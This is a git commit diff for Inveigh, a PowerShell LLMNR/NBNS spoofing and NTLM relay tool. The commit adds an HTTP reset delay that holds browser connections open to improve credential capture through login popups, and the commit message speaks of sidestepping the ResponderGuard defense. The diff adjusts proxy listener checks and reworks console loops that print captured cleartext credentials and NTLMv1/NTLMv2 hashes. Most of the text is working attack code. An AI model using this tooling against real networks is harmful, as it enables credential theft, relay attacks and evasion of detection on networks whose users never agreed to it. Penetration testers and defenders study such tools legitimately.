aboutsummaryrefslogtreecommitdiff
diff options
context:
space:
mode:
authorKevin Robertson <robertsonk@gmail.com>2017-09-25 22:59:38 -0400
committerKevin Robertson <robertsonk@gmail.com>2017-09-25 22:59:38 -0400
commit32550b99a7f8e8006f16d185e9d6f40fe4b3d9ea (patch)
treee50620176c6af9fb3fd26519f0ab9eb5520634ed
parente00b2a615bdd80fbd7b3ce68aa9fcdba925f392f (diff)
downloadInveigh-32550b99a7f8e8006f16d185e9d6f40fe4b3d9ea.tar.gz
Inveigh-32550b99a7f8e8006f16d185e9d6f40fe4b3d9ea.zip
ResponderGuard defense
Inveigh will now ignore NBNS/LLMNR requests sent directly to the host IP address rather than the broadcast/multicast address.
Diffstat
-rw-r--r--README.md4
-rw-r--r--Scripts/Inveigh-Relay.ps1488
-rw-r--r--Scripts/Inveigh.ps1601
3 files changed, 681 insertions, 412 deletions
diff --git a/README.md b/README.md
index 2b3da11..8294cb6 100644
--- a/README.md
+++ b/README.md
@@ -20,12 +20,12 @@ Inveigh is a PowerShell LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool desig
## Overview
-At its core, Inveigh is a .NET packet sniffer that listens for and responds to LLMNR/mDNS/NBNS requests while also capturing incoming NTLMv1/NTLMv2 authentication attempts over the Windows SMB service. The primary advantage of this packet sniffing method on Windows is that port conflicts with default running services are avoided. Inveigh’s HTTP/HTTPS/Proxy based features are not provided through the packet sniffer, they are provided through TCP listeners. Inveigh relies on creating multiple runspaces to load the sniffer, listeners, and control functions within a single shell and PowerShell process.
+At its core, Inveigh is a .NET packet sniffer that listens for and responds to LLMNR/mDNS/NBNS requests while also capturing incoming NTLMv1/NTLMv2 authentication attempts over the Windows SMB service. The primary advantage of this packet sniffing method on Windows is that port conflicts with default running services are avoided. Inveigh also contains HTTP/HTTPS/Proxy listeners for capturing incoming authentication requests and performing attacks. Inveigh relies on creating multiple runspaces to load the sniffer, listeners, and control functions within a single shell and PowerShell process.
##### Inveigh running with elevated privilege
![Inveigh](https://github.com/Kevin-Robertson/Inveigh/wiki/images/Inveigh.PNG)
-Since the .NET packet sniffer requires elevated privilege, Inveigh also contains UDP listener based LLMNR/mDNS/NBNS functions. These listeners can provide the ability to perform spoofing with only unprivileged access. Port conflicts can still be an issue with any running Windows listeners bound to 0.0.0.0. This generally impacts LLMNR. On a system with the Windows LLMNR service running, Inveigh’s unprivileged LLMNR spoofer will not be able to start. Inveigh can generally perform unprivileged NBNS spoofing on systems with the NBNS service already running since it’s often not bound to 0.0.0.0. Most of Inveigh’s other features, with the primary exceptions of the packet sniffer’s SMB capture and HTTPS (due to certificate install privilege requirements), do not require elevated privilege. Note that an enabled local firewall blocking all relevant ports, and without a listed service with open firewall access suitable for migration, can still prevent Inveigh from working with just unprivileged access since privileged access will likely be needed to modify the firewall settings.
+Since the .NET packet sniffer requires elevated privilege, Inveigh also contains UDP listener based LLMNR/mDNS/NBNS functions. These listeners can provide the ability to perform spoofing with only unprivileged access. Port conflicts can still be an issue with any running Windows listeners bound to 0.0.0.0. This generally impacts LLMNR. On a system with the Windows LLMNR service running, Inveigh’s unprivileged LLMNR spoofer will not be able to start. Inveigh can usually perform unprivileged NBNS spoofing on systems with the NBNS service already running since it’s often not bound to 0.0.0.0. Most of Inveigh’s other features, with the primary exceptions of the packet sniffer’s SMB capture and HTTPS (due to certificate install privilege requirements), do not require elevated privilege. Note that an enabled local firewall blocking all relevant ports, and without a listed service with open firewall access suitable for migration, can still prevent Inveigh from working with just unprivileged access since privileged access will likely be needed to modify the firewall settings.
By default, Inveigh will attempt to detect the privilege level and load the corresponding functions.
diff --git a/Scripts/Inveigh-Relay.ps1 b/Scripts/Inveigh-Relay.ps1
index ffae659..b7bd457 100644
--- a/Scripts/Inveigh-Relay.ps1
+++ b/Scripts/Inveigh-Relay.ps1
@@ -71,6 +71,14 @@ Default = localhost: The subject field for the cert that will be installed for H
Default = Disabled: (Y/N) Force deletion of an existing certificate that matches HTTPSCertIssuer and
HTTPSCertSubject.
+.PARAMETER HTTPResetDelay
+Default = Firefox: Comma separated list of keywords to use for filtering browser user agents. Matching browsers
+will have a delay before their connections are reset when Inveigh doesn't receive data. This can increase the
+chance of capturing/relaying authentication through a popup box with some browsers (Firefox).
+
+.PARAMETER HTTPResetDelayTimeout
+Default = 30 Seconds: HTTPResetDelay timeout in seconds.
+
.PARAMETER LogOutput
Default = Enabled: (Y/N) Enable/Disable storing log messages in memory.
@@ -142,7 +150,7 @@ Default = NTLM: (Anonymous/NTLM) HTTP/HTTPS server authentication type for wpad.
Anonymous can prevent browser login prompts.
.PARAMETER WPADAuthIgnore
-Default = Disabled: Comma separated list of keywords to use for filtering browser user agents. Matching browsers
+Default = Firefox: Comma separated list of keywords to use for filtering browser user agents. Matching browsers
will be skipped for NTLM authentication. This can be used to filter out browsers like Firefox that display login
popups for authenticated wpad.dat requests such as Firefox.
@@ -158,6 +166,7 @@ https://github.com/Kevin-Robertson/Inveigh
[CmdletBinding()]
param
(
+ [parameter(Mandatory=$false)][Array]$HTTPResetDelay = "Firefox",
[parameter(Mandatory=$false)][Array]$ProxyIgnore = "Firefox",
[parameter(Mandatory=$false)][Array]$Usernames = "",
[parameter(Mandatory=$false)][Array]$WPADAuthIgnore = "",
@@ -165,6 +174,7 @@ param
[parameter(Mandatory=$false)][Int]$ConsoleStatus = "",
[parameter(Mandatory=$false)][Int]$HTTPPort = "80",
[parameter(Mandatory=$false)][Int]$HTTPSPort = "443",
+ [parameter(Mandatory=$false)][Int]$HTTPResetDelayTimeout = "30",
[parameter(Mandatory=$false)][Int]$ProxyPort = "8492",
[parameter(Mandatory=$false)][Int]$RunTime = "",
[parameter(Mandatory=$true)][String]$Command = "",
@@ -280,7 +290,7 @@ if($StartupChecks -eq 'Y')
if($Proxy -eq 'Y')
{
- $HTTPS_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$ProxyPort "
+ $proxy_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$ProxyPort "
}
}
@@ -525,23 +535,42 @@ if($HTTP -eq 'Y' -or $HTTPS -eq 'Y')
if($WPADAuthIgnore.Count -gt 0)
{
- $inveigh.status_queue.Add("WPAD NTLM Auth Ignored User Agents = " + ($WPADAuthIgnore -join ",")) > $null
+ $inveigh.status_queue.Add("WPAD NTLM Authentication Ignore List = " + ($WPADAuthIgnore -join ",")) > $null
}
}
+ $HTTPResetDelay = ($HTTPResetDelay | Where-Object {$_ -and $_.Trim()})
+
+ if($HTTPResetDelay.Count -gt 0)
+ {
+ $inveigh.status_queue.Add("HTTP Reset Delay List = " + ($HTTPResetDelay -join ",")) > $null
+ $inveigh.status_queue.Add("HTTP Reset Delay Timeout = $HTTPResetDelayTimeout Seconds") > $null
+ }
+
}
if($Proxy -eq 'Y')
{
- $inveigh.status_queue.Add("Proxy Capture/Relay = Enabled") > $null
- $ProxyPortFailover = $ProxyPort + 1
- $WPADResponse = "function FindProxyForURL(url,host){return `"PROXY $proxy_WPAD_IP`:$ProxyPort; PROXY $proxy_WPAD_IP`:$ProxyPortFailover; DIRECT`";}"
- $ProxyIgnore = ($ProxyIgnore | Where-Object {$_ -and $_.Trim()})
- if($ProxyIgnore.Count -gt 0)
+ if($proxy_port_check)
{
- $inveigh.status_queue.Add("Proxy Ignored User Agents = " + ($ProxyIgnore -join ",")) > $null
+ $HTTP = "N"
+ $inveigh.status_queue.Add("Proxy Capture/Relay Disabled Due To In Use Port $ProxyPort") > $null
+ }
+ else
+ {
+ $inveigh.status_queue.Add("Proxy Capture/Relay = Enabled") > $null
+ $inveigh.status_queue.Add("Proxy Port = $ProxyPort") > $null
+ $ProxyPortFailover = $ProxyPort + 1
+ $WPADResponse = "function FindProxyForURL(url,host){return `"PROXY $proxy_WPAD_IP`:$ProxyPort; PROXY $proxy_WPAD_IP`:$ProxyPortFailover; DIRECT`";}"
+ $ProxyIgnore = ($ProxyIgnore | Where-Object {$_ -and $_.Trim()})
+
+ if($ProxyIgnore.Count -gt 0)
+ {
+ $inveigh.status_queue.Add("Proxy Ignore List = " + ($ProxyIgnore -join ",")) > $null
+ }
+
}
}
@@ -677,16 +706,34 @@ if($inveigh.status_output)
switch -Wildcard ($inveigh.status_queue[0])
{
-
+
{$_ -like "* Disabled Due To *" -or $_ -like "Run Stop-Inveigh to stop Inveigh-Relay" -or $_ -like "Windows Firewall = Enabled"}
{
- Write-Warning ($inveigh.status_queue[0] + $inveigh.newline)
+
+ if($inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.status_queue[0] + $inveigh.newline)
+ }
+ else
+ {
+ Write-Warning($inveigh.status_queue[0])
+ }
+
$inveigh.status_queue.RemoveAt(0)
}
default
{
- Write-Output ($inveigh.status_queue[0] + $inveigh.newline)
+
+ if($inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.status_queue[0] + $inveigh.newline)
+ }
+ else
+ {
+ Write-Output($inveigh.status_queue[0])
+ }
+
$inveigh.status_queue.RemoveAt(0)
}
@@ -2811,7 +2858,7 @@ $SMB_relay_response_scriptblock =
# HTTP/HTTPS/Proxy Server ScriptBlock
$HTTP_scriptblock =
{
- param ($Challenge,$Command,$HTTPIP,$HTTPPort,$HTTPS_listener,$ProxyIgnore,$proxy_listener,$RelayAutoDisable,$Service,$SMB_version,$Target,$WPADAuth,$WPADAuthIgnore,$WPADResponse)
+ param ($Challenge,$Command,$HTTPIP,$HTTPPort,$HTTPResetDelay,$HTTPResetDelayTimeout,$HTTPS_listener,$Proxy,$ProxyIgnore,$proxy_listener,$RelayAutoDisable,$Service,$SMB_version,$Target,$Usernames,$WPADAuth,$WPADAuthIgnore,$WPADResponse)
function NTLMChallengeBase64
{
@@ -3000,6 +3047,15 @@ $HTTP_scriptblock =
$HTTP_stream = $HTTP_client.GetStream()
}
+ if($HTTP_stream.DataAvailable)
+ {
+ $HTTP_data_available = $true
+ }
+ else
+ {
+ $HTTP_data_available = $false
+ }
+
while($HTTP_stream.DataAvailable)
{
$HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length)
@@ -3051,7 +3107,7 @@ $HTTP_scriptblock =
$inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type user agent $HTTP_header_user_agent received from $HTTP_source_IP")
}
- if($ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | Where-Object {$HTTP_header_user_agent -match $_}))
+ if($Proxy -eq 'Y' -and $ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | Where-Object {$HTTP_header_user_agent -match $_}))
{
$inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP")
@@ -3096,6 +3152,14 @@ $HTTP_scriptblock =
{
$HTTP_response_status_code = 0x34,0x30,0x31
$HTTP_header_authenticate = 0x57,0x57,0x57,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20
+
+ if($HTTP_request_raw_URL -match '/wpad.dat')
+ {
+ $HTTP_reset_delay = $true
+ $HTTP_reset_delay_timeout = New-TimeSpan -Seconds $HTTPResetDelayTimeout
+ $HTTP_reset_delay_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+ }
+
}
$HTTP_response_phrase = 0x55,0x6e,0x61,0x75,0x74,0x68,0x6f,0x72,0x69,0x7a,0x65,0x64
@@ -3216,13 +3280,13 @@ $HTTP_scriptblock =
}
else
{
- $NTLM = NTLMChallengeBase64 $Challenge
+ $NTLM = NTLMChallengeBase64 $Challenge $HTTP_source_IP $HTTP_client.Client.RemoteEndpoint.Port
}
}
else
{
- $NTLM = NTLMChallengeBase64 $Challenge
+ $NTLM = NTLMChallengeBase64 $Challenge $HTTP_source_IP $HTTP_client.Client.RemoteEndpoint.Port
}
}
@@ -3267,7 +3331,7 @@ $HTTP_scriptblock =
$NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[($HTTP_NTLM_offset - 24)..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-",""
$NTLM_response = $NTLM_response.Insert(48,':')
$HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_response + ":" + $NTLM_challenge
-
+
if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
{
$inveigh.NTLMv1_list.Add($HTTP_NTLM_hash)
@@ -3354,7 +3418,7 @@ $HTTP_scriptblock =
$HTTP_response_phrase = 0x4f,0x4b
$HTTP_client_close = $true
$NTLM_challenge = ""
-
+
if($inveigh.SMB_relay -and $relay_step -eq 2)
{
@@ -3521,8 +3585,18 @@ $HTTP_scriptblock =
}
else
{
- $HTTP_client.Close()
- $HTTP_client_close = $true
+
+ if($HTTP_data_available -or !$HTTP_reset_delay -or $HTTP_reset_delay_stopwatch.Elapsed -ge $HTTP_reset_delay_timeout)
+ {
+ $HTTP_client.Close()
+ $HTTP_client_close = $true
+ $HTTP_reset_delay = $false
+ }
+ else
+ {
+ Start-Sleep -m 100
+ }
+
}
}
@@ -3579,21 +3653,24 @@ $control_relay_scriptblock =
}
- Start-Sleep -S 1
- $inveigh.console_queue.Add("Inveigh exited at $(Get-Date -format 's')")
-
- if($inveigh.file_output)
+ if($inveigh.running)
{
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh exited due to $exit_message")
- }
+ Start-Sleep -S 1
+ $inveigh.console_queue.Add("Inveigh exited at $(Get-Date -format 's')")
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited due to $exit_message")
- }
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh exited due to $exit_message")
+ }
- Start-Sleep -S 1
- $inveigh.running = $false
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited due to $exit_message")
+ }
+
+ Start-Sleep -S 1
+ $inveigh.running = $false
+ }
if($inveigh.relay_running)
{
@@ -3710,10 +3787,11 @@ function HTTPListener()
$HTTP_powershell.AddScript($SMB_relay_execute_scriptblock) > $null
$HTTP_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
$HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($Command).AddArgument(
- $HTTPIP).AddArgument($HTTPPort).AddArgument($HTTPS_listener).AddArgument($ProxyIgnore).AddArgument(
- $proxy_listener).AddArgument($RelayAutoDisable).AddArgument($Service).AddArgument(
- $SMB_version).AddArgument($Target).AddArgument($WPADAuth).AddArgument($WPADAuthIgnore).AddArgument(
- $WPADResponse) > $null
+ $HTTPIP).AddArgument($HTTPPort).AddArgument($HTTPResetDelay).AddArgument(
+ $HTTPResetDelayTimeout).AddArgument($HTTPS_listener).AddArgument($Proxy).AddArgument(
+ $ProxyIgnore).AddArgument($proxy_listener).AddArgument($RelayAutoDisable).AddArgument(
+ $Service).AddArgument($SMB_version).AddArgument($Target).AddArgument($Usernames).AddArgument(
+ $WPADAuth).AddArgument($WPADAuthIgnore).AddArgument($WPADResponse) > $null
$HTTP_powershell.BeginInvoke() > $null
}
@@ -3736,10 +3814,11 @@ function HTTPSListener()
$HTTPS_powershell.AddScript($SMB_relay_execute_scriptblock) > $null
$HTTPS_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
$HTTPS_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($Command).AddArgument(
- $HTTPIP).AddArgument($HTTPSPort).AddArgument($HTTPS_listener).AddArgument($ProxyIgnore).AddArgument(
- $proxy_listener).AddArgument($RelayAutoDisable).AddArgument($Service).AddArgument(
- $SMB_version).AddArgument($Target).AddArgument($WPADAuth).AddArgument($WPADAuthIgnore).AddArgument(
- $WPADResponse) > $null
+ $HTTPIP).AddArgument($HTTPSPort).AddArgument($HTTPResetDelay).AddArgument(
+ $HTTPResetDelayTimeout).AddArgument($HTTPS_listener).AddArgument($Proxy).AddArgument(
+ $ProxyIgnore).AddArgument($proxy_listener).AddArgument($RelayAutoDisable).AddArgument(
+ $Service).AddArgument($SMB_version).AddArgument($Target).AddArgument($Usernames).AddArgument(
+ $WPADAuth).AddArgument($WPADAuthIgnore).AddArgument($WPADResponse) > $null
$HTTPS_powershell.BeginInvoke() > $null
}
@@ -3762,10 +3841,11 @@ function ProxyListener()
$proxy_powershell.AddScript($SMB_relay_execute_scriptblock) > $null
$proxy_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
$proxy_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($Command).AddArgument(
- $ProxyIP).AddArgument($ProxyPort).AddArgument($HTTPS_listener).AddArgument($ProxyIgnore).AddArgument(
- $proxy_listener).AddArgument($RelayAutoDisable).AddArgument($Service).AddArgument(
- $SMB_version).AddArgument($Target).AddArgument($WPADAuth).AddArgument($WPADAuthIgnore).AddArgument(
- $WPADResponse) > $null
+ $ProxyIP).AddArgument($ProxyPort).AddArgument($HTTPResetDelay).AddArgument(
+ $HTTPResetDelayTimeout).AddArgument($HTTPS_listener).AddArgument($Proxy).AddArgument(
+ $ProxyIgnore).AddArgument($proxy_listener).AddArgument($RelayAutoDisable).AddArgument(
+ $Service).AddArgument($SMB_version).AddArgument($Target).AddArgument($Usernames).AddArgument(
+ $WPADAuth).AddArgument($WPADAuthIgnore).AddArgument($WPADResponse) > $null
$proxy_powershell.BeginInvoke() > $null
}
@@ -3808,170 +3888,220 @@ if($ConsoleQueueLimit -ge 0 -or $inveigh.file_output -or $RelayAutoExit -or $Run
}
# Console Output Loop
-if($inveigh.console_output)
+try
{
- if($ConsoleStatus)
- {
- $console_status_timeout = New-TimeSpan -Minutes $ConsoleStatus
- $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
- }
-
- :console_loop while($inveigh.relay_running -and $inveigh.console_output)
+ if($inveigh.console_output)
{
- while($inveigh.console_queue.Count -gt 0)
+ if($ConsoleStatus)
+ {
+ $console_status_timeout = New-TimeSpan -Minutes $ConsoleStatus
+ $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+ }
+
+ :console_loop while($inveigh.relay_running -and $inveigh.console_output)
{
- switch -wildcard ($inveigh.console_queue[0])
+ while($inveigh.console_queue.Count -gt 0)
{
- {$_ -like "* written to *" -or $_ -like "* for relay *" -or $_ -like "*SMB relay *" -or $_ -like "* local administrator *"}
+ switch -wildcard ($inveigh.console_queue[0])
{
- Write-Warning ($inveigh.console_queue[0] + $inveigh.newline)
- $inveigh.console_queue.RemoveAt(0)
- }
- {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent *"}
- {
-
- if($ConsoleOutput -eq 'Y')
+ {$_ -like "* written to *" -or $_ -like "* for relay *" -or $_ -like "*SMB relay *" -or $_ -like "* local administrator *"}
{
- Write-Output ($inveigh.console_queue[0] + $inveigh.newline)
- }
- $inveigh.console_queue.RemoveAt(0)
+ if($inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+ }
+ else
+ {
+ Write-Warning($inveigh.console_queue[0])
+ }
- }
+ $inveigh.console_queue.RemoveAt(0)
+ }
- {$_ -like "* response sent" -or $_ -like "* ignoring *" -or $_ -like "* HTTP*request for *" -or $_ -like "* Proxy request for *"}
- {
-
- if($ConsoleOutput -ne "Low")
+ {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent received *"}
{
- Write-Output ($inveigh.console_queue[0] + $inveigh.newline)
- }
- $inveigh.console_queue.RemoveAt(0)
+ if($ConsoleOutput -eq 'Y')
+ {
- }
+ if($inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+ }
+ else
+ {
+ Write-Output($inveigh.console_queue[0])
+ }
- default
- {
- Write-Output ($inveigh.console_queue[0] + $inveigh.newline)
- $inveigh.console_queue.RemoveAt(0)
- }
+ }
- }
+ $inveigh.console_queue.RemoveAt(0)
- }
+ }
- if($ConsoleStatus -and $console_status_stopwatch.Elapsed -ge $console_status_timeout)
- {
-
- if($inveigh.cleartext_list.Count -gt 0)
- {
- Write-Output("$(Get-Date -format 's') - Current unique cleartext captures:" + $inveigh.newline)
- $inveigh.cleartext_list.Sort()
+ {$_ -like "* response sent" -or $_ -like "* ignoring *" -or $_ -like "* HTTP*request for *" -or $_ -like "* Proxy request for *"}
+ {
+
+ if($ConsoleOutput -ne "Low")
+ {
- foreach($unique_cleartext in $inveigh.cleartext_list)
- {
- if($unique_cleartext -ne $unique_cleartext_last)
+ if($inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+ }
+ else
+ {
+ Write-Output($inveigh.console_queue[0])
+ }
+
+ }
+
+ $inveigh.console_queue.RemoveAt(0)
+
+ }
+
+ default
{
- Write-Output($unique_cleartext + $inveigh.newline)
+
+ if($inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+ }
+ else
+ {
+ Write-Output($inveigh.console_queue[0])
+ }
+
+ $inveigh.console_queue.RemoveAt(0)
}
- $unique_cleartext_last = $unique_cleartext
}
- Start-Sleep -m 5
}
- else
+
+ if($ConsoleStatus -and $console_status_stopwatch.Elapsed -ge $console_status_timeout)
{
- Write-Output("$(Get-Date -format 's') - No cleartext credentials have been captured" + $inveigh.newline)
- }
- if($inveigh.NTLMv1_list.Count -gt 0)
- {
- Write-Output("$(Get-Date -format 's') - Current unique NTLMv1 challenge/response captures:" + $inveigh.newline)
- $inveigh.NTLMv1_list.Sort()
-
- foreach($unique_NTLMv1 in $inveigh.NTLMv1_list)
+ if($inveigh.cleartext_list.Count -gt 0)
{
- $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2)))
+ Write-Output("$(Get-Date -format 's') - Current unique cleartext captures:" + $inveigh.newline)
+ $inveigh.cleartext_list.Sort()
- if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last)
+ foreach($unique_cleartext in $inveigh.cleartext_list)
{
- Write-Output($unique_NTLMv1 + $inveigh.newline)
+ if($unique_cleartext -ne $unique_cleartext_last)
+ {
+ Write-Output($unique_cleartext + $inveigh.newline)
+ }
+
+ $unique_cleartext_last = $unique_cleartext
}
- $unique_NTLMv1_account_last = $unique_NTLMv1_account
+ Start-Sleep -m 5
}
-
- $unique_NTLMv1_account_last = ''
- Start-Sleep -m 5
- Write-Output("$(Get-Date -format 's') - Current NTLMv1 IP addresses and usernames:" + $inveigh.newline)
-
- foreach($NTLMv1_username in $inveigh.NTLMv1_username_list)
+ else
{
- Write-Output($NTLMv1_username + $inveigh.newline)
+ Write-Output("$(Get-Date -format 's') - No cleartext credentials have been captured" + $inveigh.newline)
}
+
+ if($inveigh.NTLMv1_list.Count -gt 0)
+ {
+ Write-Output("$(Get-Date -format 's') - Current unique NTLMv1 challenge/response captures:" + $inveigh.newline)
+ $inveigh.NTLMv1_list.Sort()
- Start-Sleep -m 5
- }
- else
- {
- Write-Output("$(Get-Date -format 's') - No NTLMv1 challenge/response hashes have been captured" + $inveigh.newline)
- }
+ foreach($unique_NTLMv1 in $inveigh.NTLMv1_list)
+ {
+ $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2)))
- if($inveigh.NTLMv2_list.Count -gt 0)
- {
- Write-Output("$(Get-Date -format 's') - Current unique NTLMv2 challenge/response captures:" + $inveigh.newline)
- $inveigh.NTLMv2_list.Sort()
+ if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last)
+ {
+ Write-Output($unique_NTLMv1 + $inveigh.newline)
+ }
- foreach($unique_NTLMv2 in $inveigh.NTLMv2_list)
- {
- $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2)))
+ $unique_NTLMv1_account_last = $unique_NTLMv1_account
+ }
- if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last)
+ $unique_NTLMv1_account_last = ''
+ Start-Sleep -m 5
+ Write-Output("$(Get-Date -format 's') - Current NTLMv1 IP addresses and usernames:" + $inveigh.newline)
+
+ foreach($NTLMv1_username in $inveigh.NTLMv1_username_list)
{
- Write-Output($unique_NTLMv2 + $inveigh.newline)
+ Write-Output($NTLMv1_username + $inveigh.newline)
}
- $unique_NTLMv2_account_last = $unique_NTLMv2_account
+ Start-Sleep -m 5
}
+ else
+ {
+ Write-Output("$(Get-Date -format 's') - No NTLMv1 challenge/response hashes have been captured" + $inveigh.newline)
+ }
+
+ if($inveigh.NTLMv2_list.Count -gt 0)
+ {
+ Write-Output("$(Get-Date -format 's') - Current unique NTLMv2 challenge/response captures:" + $inveigh.newline)
+ $inveigh.NTLMv2_list.Sort()
+
+ foreach($unique_NTLMv2 in $inveigh.NTLMv2_list)
+ {
+ $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2)))
+
+ if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last)
+ {
+ Write-Output($unique_NTLMv2 + $inveigh.newline)
+ }
+
+ $unique_NTLMv2_account_last = $unique_NTLMv2_account
+ }
- $unique_NTLMv2_account_last = ''
- Start-Sleep -m 5
- Write-Output("$(Get-Date -format 's') - Current NTLMv2 IP addresses and usernames:" + $inveigh.newline)
+ $unique_NTLMv2_account_last = ''
+ Start-Sleep -m 5
+ Write-Output("$(Get-Date -format 's') - Current NTLMv2 IP addresses and usernames:" + $inveigh.newline)
- foreach($NTLMv2_username in $inveigh.NTLMv2_username_list)
+ foreach($NTLMv2_username in $inveigh.NTLMv2_username_list)
+ {
+ Write-Output($NTLMv2_username + $inveigh.newline)
+ }
+
+ }
+ else
{
- Write-Output($NTLMv2_username + $inveigh.newline)
+ Write-Output("$(Get-Date -format 's') - No NTLMv2 challenge/response hashes have been captured" + $inveigh.newline)
}
-
+
+ $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+
}
- else
+
+ if($inveigh.console_input)
{
- Write-Output("$(Get-Date -format 's') - No NTLMv2 challenge/response hashes have been captured" + $inveigh.newline)
- }
- $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+ if([Console]::KeyAvailable)
+ {
+ $inveigh.console_output = $false
+ BREAK console_loop
+ }
+
+ }
+ Start-Sleep -m 5
}
- if($inveigh.console_input)
- {
+ }
- if([Console]::KeyAvailable)
- {
- $inveigh.console_output = $false
- BREAK console_loop
- }
-
- }
+}
+finally
+{
- Start-Sleep -m 5
+ if($Tool -eq 2)
+ {
+ $inveigh.relay_running = $false
}
}
@@ -4292,51 +4422,51 @@ if($inveigh.tool -ne 1)
:console_loop while((($inveigh.running -or $inveigh.relay_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output))
{
- while($inveigh.console_queue.Count -gt 0)
- {
-
- switch -wildcard ($inveigh.console_queue[0])
+ while($inveigh.console_queue.Count -gt 0)
{
- {$_ -like "* written to *" -or $_ -like "* for relay *" -or $_ -like "*SMB relay *" -or $_ -like "* local administrator *"}
- {
- Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
-
- {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent received *"}
+ switch -wildcard ($inveigh.console_queue[0])
{
- if($ConsoleOutput -eq 'Y')
+ {$_ -like "* written to *" -or $_ -like "* for relay *" -or $_ -like "*SMB relay *" -or $_ -like "* local administrator *"}
{
- Write-Output $inveigh.console_queue[0]
+ Write-Warning $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveAt(0)
}
- $inveigh.console_queue.RemoveAt(0)
+ {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent received *"}
+ {
- }
+ if($ConsoleOutput -eq 'Y')
+ {
+ Write-Output $inveigh.console_queue[0]
+ }
- {$_ -like "* response sent" -or $_ -like "* ignoring *" -or $_ -like "* HTTP*request for *" -or $_ -like "* Proxy request for *"}
- {
+ $inveigh.console_queue.RemoveAt(0)
+
+ }
+
+ {$_ -like "* response sent" -or $_ -like "* ignoring *" -or $_ -like "* HTTP*request for *" -or $_ -like "* Proxy request for *"}
+ {
- if($ConsoleOutput -ne "Low")
+ if($ConsoleOutput -ne "Low")
+ {
+ Write-Output $inveigh.console_queue[0]
+ }
+
+ $inveigh.console_queue.RemoveAt(0)
+
+ }
+
+ default
{
Write-Output $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveAt(0)
}
- $inveigh.console_queue.RemoveAt(0)
-
}
- default
- {
- Write-Output $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
-
- }
-
- }
+ }
if([Console]::KeyAvailable)
{
diff --git a/Scripts/Inveigh.ps1 b/Scripts/Inveigh.ps1
index a8e6492..0510489 100644
--- a/Scripts/Inveigh.ps1
+++ b/Scripts/Inveigh.ps1
@@ -61,28 +61,36 @@ Default = Any: IP address for the HTTP/HTTPS listener.
Default = 80: TCP port for the HTTP listener.
.PARAMETER HTTPAuth
-Default = NTLM: (Anonymous/Basic/NTLM/NTLMNoESS) HTTP/HTTPS server authentication type. This setting does not
+Default = NTLM: (Anonymous/Basic/NTLM/NTLMNoESS) HTTP/HTTPS listener authentication type. This setting does not
apply to wpad.dat requests. NTLMNoESS turns off the 'Extended Session Security' flag during negotiation.
